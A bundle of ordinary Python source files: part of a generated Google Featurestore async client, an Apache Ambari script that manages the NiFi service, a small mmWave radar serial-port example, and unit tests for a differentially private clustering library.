sent along with the request as metadata.
Returns:
~.operations_pb2.Operation:
An ``Operation`` object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.GetOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.get_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_operation(
self,
request: Optional[operations_pb2.DeleteOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a long-running operation.
This method indicates that the client is no longer interested
in the operation result. It does not cancel the operation.
If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.DeleteOperationRequest`):
The request object. Request message for
`DeleteOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
None
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.DeleteOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.delete_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def cancel_operation(
self,
request: Optional[operations_pb2.CancelOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Starts asynchronous cancellation on a long-running operation.
The server makes a best effort to cancel the operation, but success
is not guaranteed. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.CancelOperationRequest`):
The request object. Request message for
`CancelOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
None
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.CancelOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.cancel_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def wait_operation(
self,
request: Optional[operations_pb2.WaitOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.Operation:
r"""Waits until the specified long-running operation is done or reaches at most
a specified timeout, returning the latest state.
If the operation is already done, the latest state is immediately returned.
If the timeout specified is greater than the default HTTP/RPC timeout, the HTTP/RPC
timeout is used. If the server does not support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.WaitOperationRequest`):
The request object. Request message for
`WaitOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.Operation:
An ``Operation`` object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.WaitOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.wait_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def set_iam_policy(
self,
request: Optional[iam_policy_pb2.SetIamPolicyRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> policy_pb2.Policy:
r"""Sets the IAM access control policy on the specified function.
Replaces any existing policy.
Args:
request (:class:`~.iam_policy_pb2.SetIamPolicyRequest`):
The request object. Request message for `SetIamPolicy`
method.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.policy_pb2.Policy:
Defines an Identity and Access Management (IAM) policy.
It is used to specify access control policies for Cloud
Platform resources.
A ``Policy`` is a collection of ``bindings``. A
``binding`` binds one or more ``members`` to a single
``role``. Members can be user accounts, service
accounts, Google groups, and domains (such as G Suite).
A ``role`` is a named list of permissions (defined by
IAM or configured by users). A ``binding`` can
optionally specify a ``condition``, which is a logic
expression that further constrains the role binding
based on attributes about the request and/or target
resource.
**JSON Example**
::
{
"bindings": [
{
"role": "roles/resourcemanager.organizationAdmin",
"members": [
"user:mike@example.com",
"group:admins@example.com",
"domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com"
]
},
{
"role": "roles/resourcemanager.organizationViewer",
"members": ["user:eve@example.com"],
"condition": {
"title": "expirable access",
"description": "Does not grant access after Sep 2020",
"expression": "request.time <
timestamp('2020-10-01T00:00:00.000Z')",
}
}
]
}
**YAML Example**
::
bindings:
- members:
- user:mike@example.com
- group:admins@example.com
- domain:google.com
- serviceAccount:my-project-id@appspot.gserviceaccount.com
role: roles/resourcemanager.organizationAdmin
- members:
- user:eve@example.com
role: roles/resourcemanager.organizationViewer
condition:
title: expirable access
description: Does not grant access after Sep 2020
expression: request.time < timestamp('2020-10-01T00:00:00.000Z')
For a description of IAM and its features, see the `IAM
developer's
guide <https://cloud.google.com/iam/docs>`__.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.SetIamPolicyRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.set_iam_policy,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_iam_policy(
self,
request: Optional[iam_policy_pb2.GetIamPolicyRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> policy_pb2.Policy:
r"""Gets the IAM access control policy for a function.
Returns an empty policy if the function exists and does not have a
policy set.
Args:
request (:class:`~.iam_policy_pb2.GetIamPolicyRequest`):
The request object. Request message for `GetIamPolicy`
method.
retry (google.api_core.retry.Retry): Designation of what errors, if
any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.policy_pb2.Policy:
Defines an Identity and Access Management (IAM) policy.
It is used to specify access control policies for Cloud
Platform resources.
A ``Policy`` is a collection of ``bindings``. A
``binding`` binds one or more ``members`` to a single
``role``. Members can be user accounts, service
accounts, Google groups, and domains (such as G Suite).
A ``role`` is a named list of permissions (defined by
IAM or configured by users). A ``binding`` can
optionally specify a ``condition``, which is a logic
expression that further constrains the role binding
based on attributes about the request and/or target
resource.
**JSON Example**
::
{
"bindings": [
{
"role": "roles/resourcemanager.organizationAdmin",
"members": [
"user:mike@example.com",
"group:admins@example.com",
"domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com"
]
},
{
"role": "roles/resourcemanager.organizationViewer",
"members": ["user:eve@example.com"],
"condition": {
"title": "expirable access",
"description": "Does not grant access after Sep 2020",
"expression": "request.time <
timestamp('2020-10-01T00:00:00.000Z')",
}
}
]
}
**YAML Example**
::
bindings:
- members:
- user:mike@example.com
- group:admins@example.com
- domain:google.com
- serviceAccount:my-project-id@appspot.gserviceaccount.com
role: roles/resourcemanager.organizationAdmin
- members:
- user:eve@example.com
role: roles/resourcemanager.organizationViewer
condition:
title: expirable access
description: Does not grant access after Sep 2020
expression: request.time < timestamp('2020-10-01T00:00:00.000Z')
For a description of IAM and its features, see the `IAM
developer's
guide <https://cloud.google.com/iam/docs>`__.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.GetIamPolicyRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.get_iam_policy,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def test_iam_permissions(
self,
request: Optional[iam_policy_pb2.TestIamPermissionsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> iam_policy_pb2.TestIamPermissionsResponse:
r"""Tests the specified IAM permissions against the IAM access control
policy for a function.
If the function does not exist, this will return an empty set
of permissions, not a NOT_FOUND error.
Args:
request (:class:`~.iam_policy_pb2.TestIamPermissionsRequest`):
The request object. Request message for
`TestIamPermissions` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.iam_policy_pb2.TestIamPermissionsResponse:
Response message for ``TestIamPermissions`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.TestIamPermissionsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.test_iam_permissions,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_location(
self,
request: Optional[locations_pb2.GetLocationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> locations_pb2.Location:
r"""Gets information about a location.
Args:
request (:class:`~.location_pb2.GetLocationRequest`):
The request object. Request message for
`GetLocation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.location_pb2.Location:
Location object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = locations_pb2.GetLocationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.get_location,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_locations(
self,
request: Optional[locations_pb2.ListLocationsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> locations_pb2.ListLocationsResponse:
r"""Lists information about the supported locations for this service.
Args:
request (:class:`~.location_pb2.ListLocationsRequest`):
The request object. Request message for
`ListLocations` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.location_pb2.ListLocationsResponse:
Response message for ``ListLocations`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = locations_pb2.ListLocationsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.list_locations,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def __aenter__(self) -> "FeaturestoreServiceAsyncClient":
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=package_version.__version__
)
__all__ = ("FeaturestoreServiceAsyncClient",)
# ---- file: /contrib/management-packs/hdf-ambari-mpack/src/main/resources/common-services/NIFI/1.0.0/package/scripts/nifi.py | repo: apache/ambari | license: permissive (Apache-2.0) | lang: Python ----
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, nifi_ca_util, os, pwd, grp, signal, time, glob, socket, json
from resource_management.core import sudo
from resource_management import *
from subprocess import call
from setup_ranger_nifi import setup_ranger_nifi
reload(sys)
sys.setdefaultencoding('utf8')
class Master(Script):
def install(self, env):
import params
import status_params
self.install_packages(env)
Directory([params.nifi_node_dir],
owner=params.nifi_user,
group=params.nifi_group,
create_parents=True,
recursive_ownership=True
)
#update the configs specified by user
self.configure(env, True)
Execute('touch ' + params.nifi_node_log_file, user=params.nifi_user)
def configure(self, env, isInstall=False, is_starting = False):
import params
import status_params
env.set_params(params)
env.set_params(status_params)
#create the log, pid, conf dirs if not already present
Directory([status_params.nifi_pid_dir, params.nifi_node_log_dir, params.nifi_internal_dir, params.nifi_database_dir, params.nifi_flowfile_repo_dir, params.nifi_content_repo_dir_default, params.nifi_provenance_repo_dir_default, params.nifi_config_dir, params.nifi_flow_config_dir, params.nifi_state_dir, params.lib_dir],
owner=params.nifi_user,
group=params.nifi_group,
create_parents=True,
recursive_ownership=True
)
# On some OS this folder may not exist, so we will create it before pushing files there
Directory(params.limits_conf_dir,
create_parents = True,
owner='root',
group='root'
)
File(os.path.join(params.limits_conf_dir, 'nifi.conf'),
owner='root',
group='root',
mode=0644,
content=Template("nifi.conf.j2")
)
ca_client_script = nifi_ca_util.get_toolkit_script('tls-toolkit.sh')
File(ca_client_script, mode=0755)
if params.nifi_ca_host and params.nifi_ssl_enabled:
ca_client_json = os.path.realpath(os.path.join(params.nifi_config_dir, 'nifi-certificate-authority-client.json'))
ca_client_dict = nifi_ca_util.load(ca_client_json)
if is_starting:
if params.nifi_toolkit_tls_regenerate:
nifi_ca_util.move_keystore_truststore(ca_client_dict)
ca_client_dict = {}
else:
nifi_ca_util.move_keystore_truststore_if_necessary(ca_client_dict, params.nifi_ca_client_config)
nifi_ca_util.overlay(ca_client_dict, params.nifi_ca_client_config)
nifi_ca_util.dump(ca_client_json, ca_client_dict)
if is_starting:
Execute('JAVA_HOME='+params.jdk64_home+' '+ca_client_script+' client -F -f '+ca_client_json, user=params.nifi_user)
nifi_ca_util.update_nifi_properties(nifi_ca_util.load(ca_client_json), params.nifi_properties)
#write out nifi.properties
PropertiesFile(params.nifi_config_dir + '/nifi.properties',
properties = params.nifi_properties,
mode = 0400,
owner = params.nifi_user,
group = params.nifi_group)
    #write out bootstrap.conf
bootstrap_content=InlineTemplate(params.nifi_boostrap_content)
File(format("{params.nifi_config_dir}/bootstrap.conf"), content=bootstrap_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out logback.xml
logback_content=InlineTemplate(params.nifi_node_logback_content)
File(format("{params.nifi_config_dir}/logback.xml"), content=logback_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out state-management.xml
statemgmt_content=InlineTemplate(params.nifi_state_management_content)
File(format("{params.nifi_config_dir}/state-management.xml"), content=statemgmt_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out authorizers file
authorizers_content=InlineTemplate(params.nifi_authorizers_content)
File(format("{params.nifi_config_dir}/authorizers.xml"), content=authorizers_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out login-identity-providers.xml
login_identity_providers_content=InlineTemplate(params.nifi_login_identity_providers_content)
File(format("{params.nifi_config_dir}/login-identity-providers.xml"), content=login_identity_providers_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out nifi-env in bin as 0755 (see BUG-61769)
env_content=InlineTemplate(params.nifi_env_content)
File(format("{params.bin_dir}/nifi-env.sh"), content=env_content, owner=params.nifi_user, group=params.nifi_group, mode=0755)
#write out bootstrap-notification-services.xml
boostrap_notification_content=InlineTemplate(params.nifi_boostrap_notification_content)
File(format("{params.nifi_config_dir}/bootstrap-notification-services.xml"), content=boostrap_notification_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
def stop(self, env):
import params
import status_params
Execute ('export JAVA_HOME='+params.jdk64_home+';'+params.bin_dir+'/nifi.sh stop >> ' + params.nifi_node_log_file, user=params.nifi_user)
if os.path.isfile(status_params.nifi_node_pid_file):
sudo.unlink(status_params.nifi_node_pid_file)
def start(self, env):
import params
import status_params
self.configure(env, is_starting = True)
setup_ranger_nifi(upgrade_type=None)
# Write out flow.xml.gz to internal dir only if AMS installed (must be writable by Nifi)
# only during first install. It is used to automate setup of Ambari metrics reporting task in Nifi
    if params.metrics_collector_host and params.nifi_ambari_reporting_enabled and self.check_is_fresh_install(env):
Execute('echo "First time setup so generating flow.xml.gz" >> ' + params.nifi_node_log_file, user=params.nifi_user)
flow_content=InlineTemplate(params.nifi_flow_content)
File(format("{params.nifi_flow_config_dir}/flow.xml"), content=flow_content, owner=params.nifi_user, group=params.nifi_group, mode=0600)
Execute(format("cd {params.nifi_flow_config_dir}; mv flow.xml.gz flow_$(date +%d-%m-%Y).xml.gz ;"),user=params.nifi_user,ignore_failures=True)
Execute(format("cd {params.nifi_flow_config_dir}; gzip flow.xml;"), user=params.nifi_user)
Execute ('export JAVA_HOME='+params.jdk64_home+';'+params.bin_dir+'/nifi.sh start >> ' + params.nifi_node_log_file, user=params.nifi_user)
#If nifi pid file not created yet, wait a bit
if not os.path.isfile(status_params.nifi_pid_dir+'/nifi.pid'):
Execute ('sleep 5')
def status(self, env):
import status_params
check_process_status(status_params.nifi_node_pid_file)
def check_is_fresh_install(self, env):
"""
Checks if fresh nifi install by checking if zk dir exists
:return:
"""
import params, re
from resource_management.core import shell
from resource_management.core.exceptions import Fail
from resource_management.core.logger import Logger
ZK_CONNECT_ERROR = "ConnectionLoss"
ZK_NODE_NOT_EXIST = "Node does not exist"
zookeeper_queried = False
is_fresh_nifi_install = True
# For every zk server try to find nifi zk dir
zookeeper_server_list = params.config['clusterHostInfo']['zookeeper_hosts']
for zookeeper_server in zookeeper_server_list:
# Determine where the zkCli.sh shell script is
zk_command_location = os.path.join(params.stack_root, "current", "zookeeper-client", "bin", "zkCli.sh")
if params.stack_version_buildnum is not None:
zk_command_location = os.path.join(params.stack_root, params.stack_version_buildnum, "zookeeper", "bin", "zkCli.sh")
# create the ZooKeeper query command e.g.
# /usr/hdf/current/zookeeper-client/bin/zkCli.sh -server node:2181 ls /nifi
command = "{0} -server {1}:{2} ls {3}".format(
zk_command_location, zookeeper_server, params.zookeeper_port, params.nifi_znode)
# echo 'ls /nifi' | /usr/hdf/current/zookeeper-client/bin/zkCli.sh -server node:2181
#command = "echo 'ls {3}' | {0} -server {1}:{2}".format(
# zk_command_location, zookeeper_server, params.zookeeper_port, params.nifi_znode)
Logger.info("Running command: " + command)
code, out = shell.call(command, logoutput=True, quiet=False, timeout=20)
if not out or re.search(ZK_CONNECT_ERROR, out):
Logger.info("Unable to query Zookeeper: " + zookeeper_server + ". Skipping and trying next ZK server")
continue
elif re.search(ZK_NODE_NOT_EXIST, out):
Logger.info("Nifi ZNode does not exist, so must be fresh install of Nifi: " + params.nifi_znode)
zookeeper_queried = True
is_fresh_nifi_install = True
break
else:
Logger.info("Nifi ZNode already exists, so must not be a fresh install of Nifi: " + params.nifi_znode)
zookeeper_queried = True
is_fresh_nifi_install = False
break
# fail if the ZK data could not be queried
if not zookeeper_queried:
raise Fail("Unable to query for znode on on any of the following ZooKeeper hosts: {0}. Please ensure Zookeepers are started and retry".format(
zookeeper_server_list))
else:
return is_fresh_nifi_install
if __name__ == "__main__":
Master().execute()
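# --- Illustrative sketch (added, not part of the Ambari service script) ---
# check_is_fresh_install() above shells out to zkCli.sh and pattern-matches its
# output; here is the same probe reduced to a standalone Python 3 snippet.
# Assumptions: a reachable ZooKeeper at localhost:2181 and zkCli.sh on PATH;
# the matched phrases mirror the ZK_CONNECT_ERROR / ZK_NODE_NOT_EXIST constants above.
import re
import subprocess
def znode_exists(znode="/nifi", server="localhost:2181"):
    proc = subprocess.run(["zkCli.sh", "-server", server, "ls", znode],
                          capture_output=True, text=True, timeout=20)
    out = proc.stdout + proc.stderr
    if not out or re.search("ConnectionLoss", out):
        raise RuntimeError("unable to query ZooKeeper at " + server)
    return re.search("Node does not exist", out) is None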
# ---- file: /TMD_kv/Python/TMD_kv_ex0.py | repo: bigheadG/mmWave | license: none detected | lang: Python ----
'''
Traffic Monitor Detect (ISK) for BM-201 : 2020/03/09
ex0:
Hardware: Batman-201 ISK
(1)Download lib:
install:
~#sudo pip install mmWave
update:
~#sudo pip install mmWave -U
'''
import serial
import numpy as np
from mmWave import trafficMD_kv
#import trafficMD as TrafficMD
port = serial.Serial("COM189",baudrate = 921600, timeout = 0.5)
pm = trafficMD_kv.tmdISK_kv(port)
def uartGetdata(name):
print("mmWave: {:} example:".format(name))
port.flushInput()
while True:
(dck,v0,v1)=pm.tmdRead(False)
if dck:
print("=====v0 info.=====")
print(v0)
print("=======v1=====")
print(v1)
uartGetdata("Traffic Monitor Detect (TMD) for BM-201")
# ---- file: /learning/clustering/clustering_algorithm_test.py | repo: google/differential-privacy | license: permissive (Apache-2.0, BSD-3-Clause) | lang: Python ----
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for clustering_algorithm."""
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from clustering import clustering_algorithm
from clustering import clustering_params
class ClusteringTest(parameterized.TestCase):
def test_clustering_result_value_errors_unequal_dim(self):
centers = np.array([[0, 0], [100, 100]])
datapoints = np.array([[1, 0, 1], [101, 101, 99], [4, 0, 4]])
labels = np.array([0, 1, 1], dtype=int)
data = clustering_params.Data(datapoints=datapoints, radius=200)
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, labels, loss=1.0)
def test_clustering_result_value_errors_unequal_points(self):
centers = np.array([[0, 0, 0], [1, 1, 1]])
datapoints = np.array([[1, 0, 1], [101, 101, 99], [4, 0, 4]])
labels = np.array([0, 1], dtype=int)
data = clustering_params.Data(datapoints=datapoints, radius=200)
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, labels, loss=1.0)
def test_clustering_result_value_errors_labels_out_of_bounds(self):
centers = np.array([[0, 0, 0], [1, 1, 1]])
datapoints = np.array([[1, 0, 1], [101, 101, 99], [4, 0, 4]])
data = clustering_params.Data(datapoints=datapoints, radius=200)
for labels in [
np.array([-1, 0, 1], dtype=int),
np.array([0, 1, 2], dtype=int),
np.array([0, 1, 1.1])
]:
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, labels, loss=1.0)
def test_clustering_result_value_errors_loss_label_only_one_init(self):
centers = np.zeros((2, 3))
datapoints = np.zeros((4, 3))
data = clustering_params.Data(datapoints=datapoints, radius=2)
cluster_labels = np.array([0, 0, 1, 1], dtype=int)
loss = 1.0
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, cluster_labels)
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, loss=loss)
def test_get_clustering_result(self):
centers = np.array([[0, 0, 0], [100, 100, 100]])
datapoints = np.array([[1, 0, 1], [101, 101, 99], [4, 0, 4]])
data = clustering_params.Data(datapoints=datapoints, radius=200)
clustering_result = clustering_algorithm.ClusteringResult(data, centers)
self.assertLen(data.datapoints, 3)
for i, datapoint in enumerate(clustering_result.data.datapoints):
self.assertSequenceAlmostEqual(datapoints[i], datapoint)
self.assertLen(centers, 2)
for i, center in enumerate(clustering_result.centers):
self.assertSequenceAlmostEqual(centers[i], center)
self.assertListEqual(list(clustering_result.labels), [0, 1, 0])
self.assertAlmostEqual(clustering_result.loss, 37)
def test_clipped_data_used_for_clustering_and_not_result_calculation(
self):
# Clipped datapoints (radius=1): [[0.3, 0.2], [0.6, 0.8], [0.6, 0.8]]
datapoints = np.array([[0.3, 0.2], [3, 4], [6, 8]])
# Very small radius means the datapoint will be clipped for the center
# calculation.
data = clustering_params.Data(datapoints=datapoints, radius=1)
# No noise
privacy_param = clustering_params.DifferentialPrivacyParam(np.inf)
# No branching, the coreset will just be the average of the points
tree_param = clustering_params.TreeParam(1, 1, 0)
clustering_result = clustering_algorithm.private_lsh_clustering(
3,
data,
privacy_param,
tree_param=tree_param,
multipliers=clustering_params.PrivacyCalculatorMultiplier())
# Center should be calculated using the clipped data.
expected_center = np.array([0.5, 0.6])
self.assertLen(clustering_result.centers, 1)
self.assertSequenceAlmostEqual(clustering_result.centers[0],
expected_center)
self.assertListEqual(list(clustering_result.labels), [0, 0, 0])
# Loss calculation should still be relative to the original points.
self.assertAlmostEqual(clustering_result.loss, 103.02)
class ClusteringMetricsTest(absltest.TestCase):
def test_value_error_no_true_labels(self):
datapoints, radius = np.zeros(shape=(6, 4)), 1.0
data = clustering_params.Data(datapoints, radius)
centers = np.zeros(shape=(3, 4))
cluster_labels = np.array([0, 0, 1, 1, 2, 2])
clustering_result = clustering_algorithm.ClusteringResult(
data, centers, cluster_labels, loss=1.0)
with self.assertRaises(ValueError):
clustering_result.cross_label_histogram()
with self.assertRaises(ValueError):
clustering_result.get_clustering_metrics()
def test_get_clustering_metrics(self):
datapoints, radius = np.zeros(shape=(6, 4)), 1.0
labels = np.array([0, 0, 0, 1, 1, 1])
data = clustering_params.Data(datapoints, radius, labels)
centers = np.zeros(shape=(3, 4))
cluster_labels = np.array([0, 0, 1, 1, 2, 2])
clustering_result = clustering_algorithm.ClusteringResult(
data, centers, cluster_labels, loss=1.0)
clustering_metrics = clustering_result.get_clustering_metrics()
expected_cross_label_histogram = np.array([[2, 0], [1, 1], [0, 2]],
dtype=int)
self.assertTrue((clustering_metrics.cross_label_histogram ==
expected_cross_label_histogram).all())
self.assertEqual(clustering_metrics.num_points, 6)
self.assertEqual(clustering_metrics.dominant_label_correct_count, 5)
self.assertAlmostEqual(clustering_metrics.dominant_label_accuracy, 5 / 6)
self.assertEqual(clustering_metrics.true_pairs, 6)
self.assertEqual(clustering_metrics.true_nonmatch_count, 4)
self.assertAlmostEqual(clustering_metrics.true_nonmatch_frac, 4 / 6)
self.assertEqual(clustering_metrics.false_pairs, 9)
self.assertEqual(clustering_metrics.false_match_count, 1)
self.assertAlmostEqual(clustering_metrics.false_match_frac, 1 / 9)
class ClusteringEdgeCaseTest(parameterized.TestCase):
baseline_k: int
baseline_privacy_param: clustering_params.DifferentialPrivacyParam
